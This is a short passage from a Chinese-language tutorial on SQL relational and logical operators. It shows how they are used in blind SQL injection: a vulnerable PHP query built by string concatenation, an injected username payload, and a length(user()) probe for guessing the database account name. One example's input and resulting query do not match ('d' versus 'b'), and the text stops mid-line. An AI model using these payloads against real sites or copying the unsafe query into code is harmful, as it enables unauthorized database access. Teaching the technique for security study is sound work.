关系_逻辑__运算符SQL注入
1、关系运算符
等于:select * from users where id = 10;
类似的还有其他大于、小于、不等于等等。
between : select * from users where id between 1 and 5
in : ---- where id in (1,2,3);
not in: ---- where id not in (1,2,3);
is null: ---- where id is null;
is not null : ---- where id is not null;
like : ---- where id like ‘xiao%’;
关系运算符盲注猜测
SQL查询语句:
$sql="select * from users where uname='$uname'"
正常传参:uname=admin
结果:
select * from users where uname='admin'
网页盲注猜测实例:
注入传参:uname=admin’ and uname>‘a’ and uname<'d
结果:
select * from users where uname='admin' and uname>'a' and uname<'b'
测试当前账户字符长度:
select * from users where uname='admin' and length(user())>0
逐步增大数值,当超过某个数页面显示不正常,那么user表的长度就为那个数。
2、逻辑运算符
与:select * from user